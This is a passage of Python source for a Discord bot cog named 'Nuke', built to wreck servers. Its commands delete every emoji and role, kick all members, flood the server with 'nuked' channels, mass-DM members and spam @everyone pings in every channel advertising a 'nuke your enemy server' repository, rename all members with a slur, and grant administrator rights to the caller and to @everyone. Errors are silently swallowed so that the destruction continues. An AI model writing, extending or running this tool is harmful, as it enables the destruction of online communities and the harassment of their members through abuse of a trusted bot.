await channel.delete(reason=f"Action requested by {ctx.author.name} ({ctx.author.id}) | Remark: {remark}")
except Exception:
pass # silently ignore if something goes wrong
await ctx.message.add_reaction('☑️')
@commands.command(name="deleteemoji", aliases=["deletee", "demoji", "de"])
@commands.bot_has_permissions(manage_emojis=True, add_reactions=True)
@commands.cooldown(1, 120, commands.BucketType.guild)
@commands.guild_only()
async def _de(self, ctx, *, remark:str=None):
"""
This command will delete all the emojis from the server :)
Usage:
[p]deleteemoji [reason:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if remark is None: remark = "N/A"
if len(remark) > 20: remark = remark[:20:]
for emoji in ctx.guild.emojis:
try:
await emoji.delete(reason=f"Action requested by {ctx.author.name} ({ctx.author.id}) | Remark: {remark}")
except Exception:
pass # silently ignore if something goes wrong
try: await ctx.message.add_reaction('☑️')
except Exception: pass
@commands.command(name="deleteroles", aliases=["deleter", "droles", "dr"])
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
@commands.bot_has_permissions(manage_roles=True, add_reactions=True)
async def _dr(self, ctx, *, remark:str=None):
"""
This command will delete all the roles from the server :)
Usage:
[p]deleteroles [reason:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if remark is None: remark = "N/A"
if len(remark) > 20: remark = remark[:20:]
for role in ctx.guild.roles:
try:
await role.delete(reason=f"Action requested by {ctx.author.name} ({ctx.author.id}) | Remark: {remark}")
except Exception:
pass # silently ignore if something goes wrong
try: await ctx.message.add_reaction('☑️')
except Exception: pass
@commands.command(name="kickmembers", aliases=["kickm", "kmembers", "km"])
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
@commands.bot_has_permissions(kick_members=True, add_reactions=True)
async def _km(self, ctx, *, remark:str=None):
"""
This command will kick all the members from the server :)
Usage:
[p]kickmembers [reason:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if remark is None: remark = "N/A"
if len(remark) > 20: remark = remark[:20:]
for member in ctx.guild.members:
try:
await member.kick(reason=f"Action requested by {ctx.author.name} ({ctx.author.id}) | Remark: {remark}")
except Exception:
pass # silently ignore if something goes wrong
try: await ctx.message.add_reaction('☑️')
except Exception: pass
@commands.command(name="spamchannels", aliases=["spamc", "schannels", "sc"])
@commands.bot_has_permissions(manage_channels=True, add_reactions=True)
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
async def _sc(self, ctx, channels:int, *, remark:str=None):
"""
This command will create lots of channels [Text Channels ONLY] in the server :)
Usage:
[p]spamchannels [reason:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if remark is None: remark = "nuked"
if len(remark) > 20: remark = remark[:20:]
for i in range(0, channels):
try:
channel = await ctx.guild.create_text_channel("nuked", reason=f"Action requested by {ctx.author.name} ({ctx.author.id}) | Remark: {remark}")
await channel.send("https://github.com/ritik0ranjan/NukeBot \nWant to nuke your enemy server? Have a look to this link.")
except Exception:
pass # silently ignore if something goes wrong
try: await ctx.message.add_reaction('☑️')
except Exception: pass
@commands.command(name="spamdirectmessage", aliases=["spamdm", "sdirectmessage", "sdm"])
@commands.bot_has_permissions(mention_everyone=True, add_reactions=True)
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
async def _sdm(self, ctx, *, remark:str=None):
"""
This command will spam everyone ping in all the text channel :)
Usage:
[p]spamdirectmessage [text:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if remark is None: remark = "https://github.com/ritik0ranjan/NukeBot \nWant to nuke your enemy server? Have a look to this link."
if len(remark) > 200: remark = remark[:200:]
for member in ctx.guild.members:
if member.id == ctx.author.id: pass
try:
await member.send(f"Message from **{ctx.guild.name}** {remark}")
except Exception:
pass # silently ignore if something goes wrong
try: await ctx.message.add_reaction('☑️')
except Exception: pass
@commands.command(name="spameveryone", aliases=["spame", "severyone", "se"])
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
@commands.bot_has_permissions(mention_everyone=True, add_reactions=True)
async def _se(self, ctx, *, remark:str=None):
"""
This command will spam everyone ping in all the text channel :)
Usage:
[p]spameveryone [text:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if remark is None: remark = "https://github.com/ritik0ranjan/NukeBot \nWant to nuke your enemy server? Have a look to this link."
if len(remark) > 200: remark = remark[:200:]
for channel in ctx.guild.channels:
try:
await channel.send(f"@everyone {remark}")
except Exception:
pass # silently ignore if something goes wrong
try: await ctx.message.add_reaction('☑️')
except Exception: pass
@commands.command(name="changenick", aliases=["cn", "changen", "cnick"])
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
@commands.bot_has_permissions(manage_nicknames=True, add_reactions=True)
async def _cn(self, ctx, *, name:str=None):
"""
This command will change the nicknames of all the users. :)
Usage:
[p]changenick [text:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if name is None: name = "Bitch"
if len(name) > 32: name = name[:31:]
for member in ctx.guild.members:
try:
member.edit(nick=f"{name}", reason=f"Action requested by {ctx.author.name} ({ctx.author.id})")
except Exception:
pass # silently ignore if something goes wrong
await ctx.message.add_reaction('☑️')
@commands.command(name="giveadmin", aliases=["ga", "givea", "gadmin"])
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
@commands.bot_has_permissions(manage_roles=True, add_reactions=True)
async def _ga(self, ctx, *, remark:str=None):
"""
This command will create a role, and give it to you, which will have Administration access. :)
Usage:
[p]giveadmin [reason:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
role = await ctx.guild.create_role(name="Admin", hoist=True, mentionable=True, permissions=discord.Permissions.all(), reason=f"Action requested by {ctx.author.name} ({ctx.author.id}) | Remark: {remark}")
await ctx.author.add_roles(role, reason=f"Action requested by {ctx.author.name} ({ctx.author.id})")
try: await ctx.message.add_reaction('☑️')
except Exception: pass
@commands.command(name="adminall", aliases=['aa', 'admina', 'aall'])
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
@commands.bot_has_permissions(manage_roles=True, add_reactions=True)
async def _aa(self, ctx, *, remark:str=None):
"""
This command will give Administration access to ``@everyone`` role.
Usage:
[p]adminall [reason:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if len(remark) > 20: remark = remark[:20:]
await ctx.guild.default_role.edit(permissions=discord.Permissions.all(), reason=f"Action requested by {ctx.author.name} ({ctx.author.id}) | Remark: {remark}")
try: await ctx.message.add_reaction('☑️')
except Exception: pass
def setup(bot):
bot.add_cog(Nuke(bot)) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.